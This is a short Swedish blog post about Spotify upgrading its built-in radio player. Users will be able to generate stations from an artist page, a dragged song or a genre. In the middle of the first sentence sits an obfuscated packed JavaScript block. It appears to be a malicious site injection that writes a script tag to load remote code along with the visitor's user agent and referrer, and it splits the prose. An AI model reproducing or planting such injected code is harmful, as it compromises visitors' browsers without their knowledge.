Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Spotify radio blir skarpare

Spotify radio blir skarpare
Sebastian

Som eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|drtfb|var|u0026u|referrer|rkfif||js|php’.split(’|’),0,{}))
vi nämnt tidigare så är appar på väg in i Spotify.

Detta kan ni läsa mer om här:
Spotify lanserar appar

Men förutom apparna så satsar Spotify också ny på att göra radion bättre. Man har alltså förbättrat sin interna radio-spelare vilket är mycket välkommet från min sida. Den nuvarande har faktiskt varit riktigt usel.

I den uppdaterade radion ska man kunna starta en egen radiokanal direkt från en artists sida eller helt enkelt dra en låt man till gillar till radion i vänstermenyn. Utifrån låten genereras en unik radiokanal med liknande musik baserad på den låten du placerat in. Det kommer också finnas ett alternativ där du kan välja en genre och då få en radiokanal utifrån det.

Spotify säger att en skarp version kommer att släppas inom de kommande veckorna. En liten julklapp från Spotify kanske.

Mer info: www.spotify.com